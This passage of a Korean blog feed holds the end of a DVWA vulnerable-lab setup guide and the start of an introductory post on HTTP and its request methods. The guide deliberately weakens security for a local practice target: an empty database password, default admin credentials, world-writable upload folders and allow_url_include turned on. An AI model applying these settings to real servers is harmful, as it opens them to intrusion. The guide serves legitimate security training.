&lt;li&gt;&lt;a href=&quot;http://www.dvwa.co.uk/&quot;&gt;www.dvwa.co.uk&lt;/a&gt; 홈페이지에서 `DVWA-1.9.zip` 파일 다운로드 (요즘은 github를 통해 다운해서 사용. 링크:&lt;a href=&quot;https://github.com/digininja/DVWA&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://github.com/digininja/DVWA)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;`/root/Downloads` 로 파일이 다운되면 해당 디렉터리로 이동&lt;/li&gt;
&lt;li&gt;압축 해제 `unzip DVWA-1.9.zip`&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;320&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ckv3nQ/btsLJ8SMupq/y9emT5KcvyFqNx09WS8KP1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ckv3nQ/btsLJ8SMupq/y9emT5KcvyFqNx09WS8KP1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ckv3nQ/btsLJ8SMupq/y9emT5KcvyFqNx09WS8KP1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fckv3nQ%2FbtsLJ8SMupq%2Fy9emT5KcvyFqNx09WS8KP1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;320&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;320&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) DVWA 폴더 이름 변경 및 apache2 디렉토리 이동, 권한 주기&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;`mv DVWA-1.9 dvwa` DVWA-1.9 디렉토리 이름을 dvwa로 변경&lt;/li&gt;
&lt;li&gt;`mv dvwa/ /var/www/html` dvwa 디렉토리를 /var/www/html로 이동시킴&lt;/li&gt;
&lt;li&gt;`cd /var/www/html`&lt;/li&gt;
&lt;li&gt;`chmod -R 755 /var/www/html/dvwa/` 권한 설정&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3) `config.inc.php` 파일 수정하기&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;`cd /var/www/html/dvwa/config` 로 이동&lt;/li&gt;
&lt;li&gt;`vi config.inc.php` 파일 수정&lt;/li&gt;
&lt;li&gt;`db_password` 부분은 ''(공백)으로 만든다&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;320&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bRTCpV/btsLLA8stZv/GfzL8zOBnTuFP0EwmKUejk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bRTCpV/btsLLA8stZv/GfzL8zOBnTuFP0EwmKUejk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bRTCpV/btsLLA8stZv/GfzL8zOBnTuFP0EwmKUejk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbRTCpV%2FbtsLLA8stZv%2FGfzL8zOBnTuFP0EwmKUejk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;320&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;320&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4) dvwa database 만들기&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;`service mysql restart`로 mysql 재시작&lt;/li&gt;
&lt;li&gt;`mysql -u root -p` user는 root password는 없음 (Enter만 입력)&lt;/li&gt;
&lt;li&gt;`create database dvwa;`로 dvwa라는 database를 만듦&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;316&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/4KAbB/btsLL4nM0nu/2KZ5q78390s7i5iUjPEHwk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/4KAbB/btsLL4nM0nu/2KZ5q78390s7i5iUjPEHwk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/4KAbB/btsLL4nM0nu/2KZ5q78390s7i5iUjPEHwk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F4KAbB%2FbtsLL4nM0nu%2F2KZ5q78390s7i5iUjPEHwk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;316&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;316&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/li&gt;
&lt;li&gt;`show databases;`&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;321&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/eorfIY/btsLJi9AFao/Ya71K8juYTHCqNa3NlLDZk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/eorfIY/btsLJi9AFao/Ya71K8juYTHCqNa3NlLDZk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/eorfIY/btsLJi9AFao/Ya71K8juYTHCqNa3NlLDZk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FeorfIY%2FbtsLJi9AFao%2FYa71K8juYTHCqNa3NlLDZk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;321&quot; data-origin-width=&quot;480&quot; data-origin-height=&quot;321&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;5) curl 사용하기&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;`curl --data 'create db=create+%2F+Reset+Database'`&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://127.0.0.1/dvwa/setup.php#&quot;&gt;http://127.0.0.1/dvwa/setup.php#&lt;/a&gt; --cookie PHPSESSID=1&lt;/li&gt;
&lt;li&gt;`service apache2 restart`로 apache 재시작&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;6) DVWA 웹 접속&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;127.0.0.1/dvwa/login.php&lt;/b&gt; 또는&lt;b&gt; localhost/dvwa/login.php&lt;/b&gt;로 접속&lt;/li&gt;
&lt;li&gt;id : admin / pw : password&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;740&quot; data-origin-height=&quot;565&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ciKrV3/btsLJFwEBXG/Bw4fhu0rKJsm8GkYXZBlLk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ciKrV3/btsLJFwEBXG/Bw4fhu0rKJsm8GkYXZBlLk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ciKrV3/btsLJFwEBXG/Bw4fhu0rKJsm8GkYXZBlLk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FciKrV3%2FbtsLJFwEBXG%2FBw4fhu0rKJsm8GkYXZBlLk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;480&quot; height=&quot;365&quot; data-origin-width=&quot;740&quot; data-origin-height=&quot;565&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;3. 그외 DVWA 설치 환경 조성하기&lt;/b&gt;&lt;/h4&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;Setup/ Reset DB에서 Disabled된 화면을 볼 수 있다.&lt;/li&gt;
&lt;li&gt;`chmod 777 -R /var/www/html/dvwa/hackable/uploads`&lt;/li&gt;
&lt;li&gt;`chmod 666 /var/www/html/dvwa/external/phpids/0.6/lib/IDS/tmp/phpids_log.txt`&lt;/li&gt;
&lt;li&gt;`vi /etc/php/7.0/apache2/php.ini`에서 allow_url_include=Off &amp;gt; On으로 변경&lt;/li&gt;
&lt;li&gt;`sudo apt-get install php7.0-gd` (php기 5.x 버전이면 `sudo apt-get install php5-gd`)&lt;/li&gt;
&lt;li&gt;reCAPTCHA key는 &lt;a href=&quot;https://www.google.com/recaptcha/admin/create&quot;&gt;https://www.google.com/recaptcha/admin/create&lt;/a&gt; 에서 만들어서 `/var/www/html/dvwa/config`에 있는 `config.inc.php`의 `recaptcha_public_key`와 `recaptcha_private_key`에 넣어주기&lt;/li&gt;
&lt;/ul&gt;</description>
      <category>웹 보안/DVWA 실습</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/655</guid>
      <comments>https://jennana.tistory.com/655#entry655comment</comments>
      <pubDate>Sun, 12 Jan 2025 08:02:55 +0900</pubDate>
    </item>
    <item>
      <title>[WEB] 웹의 이해</title>
      <link>https://jennana.tistory.com/654</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;웹의 이해&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt; &lt;/b&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;1. HTTP란?&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;HTTP는 OSI 7계층에 속하는 프로토콜로 우리가 흔히 아는 웹페이지에 접속할때 사용하는 프로토콜이다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;  URL&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;웹 리소스에 접근하기 위해서 사용하는 &lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;주소&lt;/b&gt;&lt;/span&gt;로, 인터넷 상에서 리소스를 식별하고 위치를 지정하는 역할을 한다.&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style2&quot;&gt;&lt;b&gt;프로토콜://호스트이름:포트번호/경로?파라미터&lt;br /&gt;&lt;/b&gt;ex) http://example.com/login.jsp?id=test&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;color: #666666; text-align: left;&quot;&gt;&lt;b&gt;프로토콜 :&lt;/b&gt; http://또는 https://로 시작하고, URL에서 사용하는 프로토콜을 나타낸다.&lt;/span&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;span style=&quot;color: #666666; text-align: left;&quot;&gt;&lt;b&gt;호스트이름 :&lt;/b&gt; 도메인이름 또는 IP주소를 통해 서버의 위치를 지정한다.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666; text-align: left;&quot;&gt;&lt;b&gt;포트번호(선택사항) :&lt;/b&gt; 요청이 전송되는 네트워크의 포트를 지정. 기본적으로 생략가능하며, 생략 시 HTTP는 80, HTTPS는 443포트를 사용한다.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666; text-align: left;&quot;&gt;&lt;b&gt;경로 :&lt;/b&gt; 서버의 리소스를 식별하기 위한 경로이다.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #666666; text-align: left;&quot;&gt;&lt;b&gt;파라미터 :&lt;/b&gt; 파일에 전달되는 값을 뜻한다.&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;2. HTTP 구조&lt;/b&gt;&lt;/h3&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;클라이언트와 서버 간의 요청 및 응답을 통해 데이터를 전송하는 프로토콜은 요청(Request)와 응답(Response) 메시지로 구성되어 있다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;712&quot; data-origin-height=&quot;248&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bNRR36/btsLJk0Crf6/2se30kgkp4KSIUwimxxZB1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bNRR36/btsLJk0Crf6/2se30kgkp4KSIUwimxxZB1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bNRR36/btsLJk0Crf6/2se30kgkp4KSIUwimxxZB1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbNRR36%2FbtsLJk0Crf6%2F2se30kgkp4KSIUwimxxZB1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;712&quot; height=&quot;248&quot; data-origin-width=&quot;712&quot; data-origin-height=&quot;248&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;HTTP Request 구조&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;클라이언트가 서버에게 리소스를 요청할 때 사용된다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;1) 요청 줄 (Reuest Line)&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;Method&lt;/b&gt;&lt;/span&gt; : 요청의 동작을 정의&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;URL&lt;/b&gt;&lt;/span&gt; : 요청 리소스의 경로&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #009a87;&quot;&gt;&lt;b&gt;HTTP 버전&lt;/b&gt;&lt;/span&gt; : HTTP 프로토콜의 버전(예: HTTP/1.1, HTTP/2)&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 160px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #009a87;&quot;&gt;&lt;b&gt;Method&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR'; color: #009a87;&quot;&gt;&lt;b&gt;설명&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;GET&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;서버에서 특정 리소스를 조회할 때 사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;POST&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;서버에 데이터를 전송하고 처리 요청을 할 때 사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;PUT&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;서버에 지정된 리소스를 생성하거나 기존 리소스를 완전히 교체&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;DELETE&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;서버에서 특정 리소스를 삭제&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;HEAD&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;GET요청과 동일하지만, 응답 본문을 제외하고 헤더 정보만 반환&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;OPTIONS&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;특정 URL에서 사용할 수 있는 매소드 목록을 확인&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;PATCH&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;서버의 기존 리소스의 일부를 수정&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;TRACE&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;요청이 서버까지 도달하는 경로를 테스트하기 위해 사용&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 16px;&quot;&gt;
&lt;td style=&quot;width: 25%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;CONNECT&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; height: 16px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;프록시 서버를 통해 TCP 터널을 설정&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Method 중에서 가장 많이 사용되는 GET과 POST 비교이다.&lt;span&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;959&quot; data-origin-height=&quot;438&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bnWW3c/btsLKNmUJzX/x0VJdygDZ1j8Xb8vgGKD01/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bnWW3c/btsLKNmUJzX/x0VJdygDZ1j8Xb8vgGKD01/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bnWW3c/btsLKNmUJzX/x0VJdygDZ1j8Xb8vgGKD01/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbnWW3c%2FbtsLKNmUJzX%2Fx0VJdygDZ1j8Xb8vgGKD01%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;698&quot; height=&quot;319&quot; data-origin-width=&quot;959&quot; data-origin-height=&quot;438&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;font-family: 'IBM Plex Sans KR'; sans-serif; box-sizing: border-box; margin: 10px; line-height: 1.5em; background-color: #424242; padding: 20px; color: #ffffff; border-radius: 20px;&quot;&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 255px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center; height: 23px;&quot;&gt;&lt;span style=&quot;color: #dddddd;&quot;&gt;&lt;b&gt; 항목 &lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center; height: 23px;&quot;&gt;&lt;span style=&quot;color: #dddddd;&quot;&gt;&lt;b&gt; GET &lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center; height: 23px;&quot;&gt;&lt;span style=&quot;color: #dddddd;&quot;&gt;&lt;b&gt;POST&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;목적&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt; 데이터 조회 &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt; 데이터 전송, 생성 &lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;데이터 전달 위치&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;URL의 쿼리 문자열&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;HTTP 요청 Body&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;데이터&amp;nbsp;크기&amp;nbsp;제한 &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;URL&amp;nbsp;길이&amp;nbsp;제한&amp;nbsp;존재&amp;nbsp;(2,048자&amp;nbsp;등&amp;nbsp;브라우저/서버에&amp;nbsp;따라&amp;nbsp;다름). &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;사실상&amp;nbsp;데이터&amp;nbsp;크기&amp;nbsp;제한&amp;nbsp;없음&amp;nbsp;(서버&amp;nbsp;설정에&amp;nbsp;따름).&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;보안&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;데이터가&amp;nbsp;URL에&amp;nbsp;노출됨. &lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;데이터가&amp;nbsp;URL에&amp;nbsp;노출되지&amp;nbsp;않음.&amp;nbsp;(HTTPS&amp;nbsp;사용&amp;nbsp;시&amp;nbsp;더&amp;nbsp;안전)&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 23px;&quot;&gt;
&lt;td style=&quot;width: 33.3333%; height: 23px;&quot;&gt;&lt;span style=&quot;color: #ffffff;&quot;&gt;캐싱&amp;nbsp;가능성 &lt;/span&gt;&lt;/td&gt;
